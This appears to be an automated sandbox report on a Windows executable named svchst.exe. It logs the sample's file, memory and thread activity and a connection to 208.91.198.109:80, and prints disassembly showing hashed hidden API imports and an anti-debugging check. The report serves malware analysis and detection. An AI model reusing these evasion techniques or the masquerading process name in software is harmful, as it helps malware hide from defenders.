File opened Path: O: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977026550
File opened Path: O: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977027495
File opened Path: O: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977028085
File opened Path: O: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977029031
File opened Path: O: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977029824
File opened Path: P: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977030781
File opened Path: P: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977031477
File opened Path: P: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977032451
File opened Path: P: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977033039
File opened Path: P: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977033980
File opened Path: P: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977034568
File opened Path: Q: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977035510
File opened Path: Q: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977036099
File opened Path: Q: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977037101
File opened Path: Q: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977037689
File opened Path: Q: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977038629
File opened Path: Q: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977039213
File opened Path: R: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977040152
File opened Path: R: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977040739
File opened Path: R: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977041680
File opened Path: R: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977042266
File opened Path: R: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977043208
File opened Path: R: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977043793
File opened Path: S: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977044734
File opened Path: S: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977045322
File opened Path: S: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977046384
File opened Path: S: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977046977
File opened Path: S: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977047922
File opened Path: S: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977048562
File opened Path: T: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977049520
File opened Path: T: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977050112
File opened Path: T: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977051055
File opened Path: T: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977051644
File opened Path: T: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977052589
File opened Path: T: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977053178
File opened Path: U: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977054123
File opened Path: U: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977054708
File opened Path: U: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977055652
File opened Path: U: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977056237
File opened Path: U: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977057177
File opened Path: U: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977057761
File opened Path: V: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977058702
File opened Path: V: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977059295
File opened Path: V: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977060822
File opened Path: V: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977061417
File opened Path: V: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977062365
File opened Path: V: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977062954
File opened Path: W: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977063899
File opened Path: W: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977064490
File opened Path: W: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977065560
File opened Path: W: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977066162
File opened Path: W: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977067112
File opened Path: W: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977067703
File opened Path: X: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977068651
File opened Path: X: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977069249
File opened Path: X: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977070194
File opened Path: X: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977070784
File opened Path: X: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977071730
File opened Path: X: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977072319
File opened Path: Y: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977073264
File opened Path: Y: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977073850
File opened Path: Y: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977074836
File opened Path: Y: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977075426
File opened Path: Y: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977076371
File opened Path: Y: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977076615
File opened Path: Z: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977077987
File opened Path: Z: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977078586
File opened Path: Z: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977079533
File opened Path: Z: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977080124
File opened Path: Z: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977081138
File opened Path: Z: Access: read attributes and synchronize Options: synchronous io non alert and non directory file Overwritten: false object name not found 977081730
Thread delayed Time: -120 TID: 1152 unknown 977082175
General
Start time: 09:39:52
Start date: 24/01/2012
Path: C:\WINDOWS\svchst.exe
Wow64 process (32bit): false
Commandline: C:\WINDOWS\svchst.exe
Imagebase: 0x400000
File size: 196608 bytes
MD5 hash: 6B16C4526A013E744B3D91CD7A091C36

File Activities

File Path | Access | Options | Content overwritten | Completion | Count | Source Address | Symbol
File Path | Access | Attributes | Options | Completion | Count | Source Address | Symbol
C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf | read attributes and synchronize and generic read and generic write | normal | synchronous io non alert and non directory file | success or wait | 1 | 403134 | CreateFileA
File Path | Offset | Length | Value | Completion | Count | Source Address | Symbol
C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf | unknown | 1 | 34 | success or wait | 32 | 402DD5 | WriteFile
File Path | Offset | Length | Completion | Count | Source Address | Symbol
File Path | Disposition | File Mask | Completion | Count | Source Address | Symbol
C:\WINDOWS | BothDirectoryInformation | svchst.exe | success or wait | 1 | 407930 | FindFirstFileA
C:\Documents and Settings\NetworkService\Local Settings\Application Data | BothDirectoryInformation | sLT.exf | no such file | 1 | 407930 | FindFirstFileA
File Path | Disposition | Data | Ascii Data | Completion | Count | Source Address | Symbol

Section Activities

File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\advapi32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\oleaut32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\shell32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 440000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 440000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 880000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 890000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 890000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 890000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 890000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 890000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 8B0000 618496 own pid readonly success or wait 1
C:\WINDOWS\system32\mswsock.dll write and read and execute commit C60000 245760 own pid execute success or wait 1
C:\WINDOWS\system32\mswsock.dll query and write and read and execute image 71A50000 258048 own pid read write success or wait 1
\KnownDlls\DNSAPI.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\dnsapi.dll query and write and read and execute image 76F20000 159744 own pid read write success or wait 1
\KnownDlls\rasadhlp.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\rasadhlp.dll query and write and read and execute image 76FC0000 24576 own pid read write success or wait 1
\KnownDlls\hnetcfg.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\hnetcfg.dll query and write and read and execute image 662B0000 360448 own pid read write success or wait 1
C:\WINDOWS\system32\wshtcpip.dll write and read and execute commit 930000 20480 own pid execute success or wait 1
C:\WINDOWS\system32\wshtcpip.dll query and write and read and execute image 71A90000 32768 own pid read write success or wait 1
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\ws2_32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 4146F4
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 4146F4
\KnownDlls\WS2HELP.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 4146F4
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 4146F4
\KnownDlls\ssleay32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 41F420
\KnownDlls\libeay32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 41F420
\KnownDlls\libssl32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1 41F420

Registry Activities

Key Path Name Type Old Data New Data Completion Count Source Address Symbol
Key Path Name Completion Count Source Address Symbol

Process Activities

PID Path Process info class Completion Count Source Address Symbol

Thread Activities

TID PID EIP EAX (Usermode EIP) Filepath Completion Count Source Address Symbol
784 1616 7C8106F9 404358 C:\WINDOWS\svchst.exe success or wait 1 4043CB CreateThread
TID PID Path Completion Count Source Address Symbol
784 1616 C:\WINDOWS\svchst.exe success or wait 2 4134F9 ResumeThread
TID Delay Completion Count Source Address Symbol
784 0s success or wait 1 41377E Sleep
784 0s success or wait 1 41377E Sleep
784 -179s success or wait 1 42975F Sleep

Memory Activities

PID Filepath Base Length Protection Completion Count Source Address Symbol
1616 C:\WINDOWS\svchst.exe 960000 12FA74 page no access success or wait 1 401554 VirtualAlloc
1616 C:\WINDOWS\svchst.exe 149000 12F7E8 page read and write success or wait 1 401394 LocalAlloc
1616 C:\WINDOWS\svchst.exe 960000 12FA64 page read and write success or wait 1 401726 VirtualAlloc
1616 C:\WINDOWS\svchst.exe 8B0000 C5FDE0 page read and write success or wait 1 4062EB GlobalAlloc
1616 C:\WINDOWS\svchst.exe 8B0000 C5FDDC page read and write success or wait 1 4062EB GlobalAlloc
1616 C:\WINDOWS\svchst.exe 14F000 C5F998 page read and write success or wait 1 4062EB GlobalAlloc
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
1616 C:\WINDOWS\svchst.exe 400000 1000 page read and write page read and write success or wait 2 437D1F VirtualProtect
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
09:39:53 0 2 0
09:39:54 0 2 0
09:39:55 0 2 0

System Activities

System info class Completion Count Source Address Symbol

Timing Activities

Time Completion Count Source Address Symbol

Network Activities

IP Port Completion Count Source Address Symbol
0.0.0.0 0 success or wait 1 413A0A connect
IP Port Completion Count Source Address Symbol
208.91.198.109 80 pending 1 413A0A connect
Chronological Activities
Operation Data Completion Time
Memory attributes changed PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 400000 Length: 1000 New Protection: page read and write Old Protection: page read and write success or wait 549580625
Memory attributes changed PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 400000 Length: 1000 New Protection: page read and write Old Protection: page read and write success or wait 549581443
Memory allocated PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 960000 Length: 12FA74 Allocation Type: unknown Protection: page no access success or wait 549612937
Memory allocated PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 149000 Length: 12F7E8 Allocation Type: unknown Protection: page read and write success or wait 549615473
Memory allocated PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 960000 Length: 12FA64 Allocation Type: unknown Protection: page read and write success or wait 549617114
Section loaded Path: \KnownDlls\ws2_32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 549799950
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 549802672
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 549823168
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 549825739
Section loaded Path: \KnownDlls\ssleay32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 550089619
Section loaded Path: \KnownDlls\libeay32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 550091342
Section loaded Path: \KnownDlls\libssl32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 550092072
Directory Information Queried Path: C:\WINDOWS Disposition: BothDirectoryInformation Filemask: svchst.exe success or wait 550095247
Directory Information Queried Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data Disposition: BothDirectoryInformation Filemask: sLT.exf no such file 550184255
File created Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: true success or wait 550189199
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550201901
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550214108
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550222879
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550241185
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550253173
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550263758
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550283461
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550303243
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550325004
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550358854
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550380612
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550397529
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550438346
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550487300
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550552399
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550592062
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550648493
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550684034
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550708544
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550730821
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550826612
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550905153
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 550990629
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 551050666
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 551124472
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 551196515
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 551231268
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 551253361
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 551268681
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 551280843
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 551339811
File write Path: C:\Documents and Settings\NetworkService\Local Settings\Application Data\sLT.exf Offset: unknown Length: 1 Value: 34 success or wait 551365859
Thread created PID: 1616 TID: 784 EIP: 7C8106F9 EAX: 404358 Imagepath: C:\WINDOWS\svchst.exe success or wait 551411403
Thread resumed TID: 784 PID: 1616 Path: C:\WINDOWS\svchst.exe success or wait 551412370
Thread resumed TID: 784 PID: 1616 Path: C:\WINDOWS\svchst.exe success or wait 551413856
Memory allocated PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 8B0000 Length: C5FDE0 Allocation Type: unknown Protection: page read and write success or wait 551418450
Memory allocated PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 8B0000 Length: C5FDDC Allocation Type: unknown Protection: page read and write success or wait 551419652
Memory allocated PID: 1616 Path: C:\WINDOWS\svchst.exe Base: 14F000 Length: C5F998 Allocation Type: unknown Protection: page read and write success or wait 551420983
Listening socket Port: 0 IP: 0.0.0.0 success or wait 554619165
Connected socket Port: 80 IP: 208.91.198.109 pending 554629821
Thread delayed Time: 0 TID: 784 success or wait 554650050
Thread delayed Time: 0 TID: 784 success or wait 556309813
Thread delayed Time: -179 TID: 784 success or wait 556314256

Disassembly

Code Analysis

Executed Functions
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • GetDriveTypeA.KERNEL32, ref: 00414286
Address Instruction Meta Information
00414270 push ebp xrefs 00415409, 00415500, 00415646, 00413EFE
00414271 mov ebp, esp
00414273 mov eax, dword ptr [ebp+08h]
00414276 push eax
00414277 push 6B5366BEh
0041427C push 399354CEh
00414281 call 00415E40h
00414286 call eax GetDriveTypeA@KERNEL32.DLL (Hidden Import)
00414288 pop ebp
00414289 retn 0004h function end
Strings
  • ntdll.dll, va: 0041215C
  • ZwQueryInformationProcess, va: 00412168
Address Instruction Meta Information
00412190 push ebp xrefs 00414897
00412191 mov ebp, esp
00412193 sub esp, 14h
00412196 mov dword ptr [ebp-08h], 00000000h
0041219D lea eax, dword ptr [ebp-08h]
004121A0 push eax
004121A1 push FFFFFFFFh
004121A3 call 00412250h
004121A8 cmp dword ptr [ebp-08h], 00000000h
004121AC je 004121B5h
004121AE mov al, 01h
004121B0 jmp 00412246h
004121B5 push 0041215Ch ASCII "ntdll.dll" xrefs 004121AC
004121BA call 00412270h
004121BF mov dword ptr [ebp-10h], eax
004121C2 cmp dword ptr [ebp-10h], 00000000h
004121C6 jne 004121CCh
004121C8 mov al, 01h
004121CA jmp 00412246h
004121CC push 00412168h ASCII "ZwQueryInformationProcess" xrefs 004121C6
004121D1 mov ecx, dword ptr [ebp-10h]
004121D4 push ecx
004121D5 call 00412290h
004121DA mov dword ptr [ebp-04h], eax
004121DD cmp dword ptr [ebp-04h], 00000000h
004121E1 jne 004121E7h
004121E3 mov al, 01h
004121E5 jmp 00412246h
004121E7 mov dword ptr [ebp-0Ch], 00000000h xrefs 004121E1
004121EE mov dword ptr [ebp-14h], 00000001h
004121F5 push 00000000h
004121F7 push 00000004h
004121F9 lea edx, dword ptr [ebp-0Ch]
004121FC push edx
004121FD push 00000007h
004121FF push FFFFFFFFh
00412201 call dword ptr [ebp-04h]
00412204 test eax, eax
00412206 jl 00412212h
00412208 cmp dword ptr [ebp-0Ch], 00000000h
0041220C je 00412212h
0041220E mov al, 01h
00412210 jmp 00412246h
00412212 push 00000000h xrefs 00412206, 0041220C
00412214 push 00000004h
00412216 lea eax, dword ptr [ebp-0Ch]
00412219 push eax
0041221A push 0000001Eh
0041221C push FFFFFFFFh
0041221E call dword ptr [ebp-04h]
00412221 test eax, eax
00412223 jne 00412229h
00412225 mov al, 01h
00412227 jmp 00412246h
00412229 push 00000000h xrefs 00412223
0041222B push 00000004h
0041222D lea ecx, dword ptr [ebp-14h]
00412230 push ecx
00412231 push 0000001Fh
00412233 push FFFFFFFFh
00412235 call dword ptr [ebp-04h]
00412238 test eax, eax
0041223A jl 00412246h
0041223C mov edx, dword ptr [ebp-14h]
0041223F and edx, 01h
00412242 jne 00412246h
00412244 mov al, 01h
00412246 mov esp, ebp xrefs 0041223A, 00412242, 00412227, 00412210, 004121E5, 004121CA, 004121B0
00412248 pop ebp
00412249 ret function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • RegSetValueExA.ADVAPI32, ref: 00414A9A
Address Instruction Meta Information
00414A70 push ebp xrefs 004147BE
00414A71 mov ebp, esp
00414A73 mov eax, dword ptr [ebp+1Ch]
00414A76 push eax
00414A77 mov ecx, dword ptr [ebp+18h]
00414A7A push ecx
00414A7B mov edx, dword ptr [ebp+14h]
00414A7E push edx
00414A7F mov eax, dword ptr [ebp+10h]
00414A82 push eax
00414A83 mov ecx, dword ptr [ebp+0Ch]
00414A86 push ecx
00414A87 mov edx, dword ptr [ebp+08h]
00414A8A push edx
00414A8B push 647832FCh
00414A90 push 3E400FD6h
00414A95 call 00415E40h
00414A9A call eax RegSetValueExA@ADVAPI32.DLL (Hidden Import)
00414A9C pop ebp
00414A9D retn 0018h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • WriteProcessMemory.KERNEL32, ref: 00414546
Address Instruction Meta Information
00414520 push ebp xrefs 00414343, 004143EB, 004143B4, 004152C8, 004152E6
00414521 mov ebp, esp
00414523 mov eax, dword ptr [ebp+18h]
00414526 push eax
00414527 mov ecx, dword ptr [ebp+14h]
0041452A push ecx
0041452B mov edx, dword ptr [ebp+10h]
0041452E push edx
0041452F mov eax, dword ptr [ebp+0Ch]
00414532 push eax
00414533 mov ecx, dword ptr [ebp+08h]
00414536 push ecx
00414537 push 6B5366BEh
0041453C push BEA0BF35h
00414541 call 00415E40h
00414546 call eax WriteProcessMemory@KERNEL32.DLL (Hidden Import)
00414548 pop ebp
00414549 retn 0014h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • FindNextFileA.KERNEL32, ref: 004141FA
Address Instruction Meta Information
004141E0 push ebp xrefs 0041468B, 00413EB4
004141E1 mov ebp, esp
004141E3 mov eax, dword ptr [ebp+0Ch]
004141E6 push eax
004141E7 mov ecx, dword ptr [ebp+08h]
004141EA push ecx
004141EB push 6B5366BEh
004141F0 push 279DEAD7h
004141F5 call 00415E40h
004141FA call eax FindNextFileA@KERNEL32.DLL (Hidden Import)
004141FC pop ebp
004141FD retn 0008h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • FindFirstFileA.KERNEL32, ref: 0041410A
Address Instruction Meta Information
004140F0 push ebp xrefs 0041465F, 00413D6C
004140F1 mov ebp, esp
004140F3 mov eax, dword ptr [ebp+0Ch]
004140F6 push eax
004140F7 mov ecx, dword ptr [ebp+08h]
004140FA push ecx
004140FB push 6B5366BEh
00414100 push 32432444h
00414105 call 00415E40h
0041410A call eax FindFirstFileA@KERNEL32.DLL (Hidden Import)
0041410C pop ebp
0041410D retn 0008h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CreateThread.KERNEL32, ref: 00414B7A
Address Instruction Meta Information
00414B50 push ebp xrefs 00414982, 00414996, 0041495A
00414B51 mov ebp, esp
00414B53 mov eax, dword ptr [ebp+1Ch]
00414B56 push eax
00414B57 mov ecx, dword ptr [ebp+18h]
00414B5A push ecx
00414B5B mov edx, dword ptr [ebp+14h]
00414B5E push edx
00414B5F mov eax, dword ptr [ebp+10h]
00414B62 push eax
00414B63 mov ecx, dword ptr [ebp+0Ch]
00414B66 push ecx
00414B67 mov edx, dword ptr [ebp+08h]
00414B6A push edx
00414B6B push 6B5366BEh
00414B70 push 6FB89AF0h
00414B75 call 00415E40h
00414B7A call eax CreateThread@KERNEL32.DLL (Hidden Import)
00414B7C pop ebp
00414B7D retn 0018h function end
APIs
    • SwitchToThread.KERNEL32, ref: 00415E55
  • CreateProcessA.KERNEL32, ref: 004144EA
Address Instruction Meta Information
004144B0 push ebp xrefs 00414300, 0041516E
004144B1 mov ebp, esp
004144B3 mov eax, dword ptr [ebp+2Ch]
004144B6 push eax
004144B7 mov ecx, dword ptr [ebp+28h]
004144BA push ecx
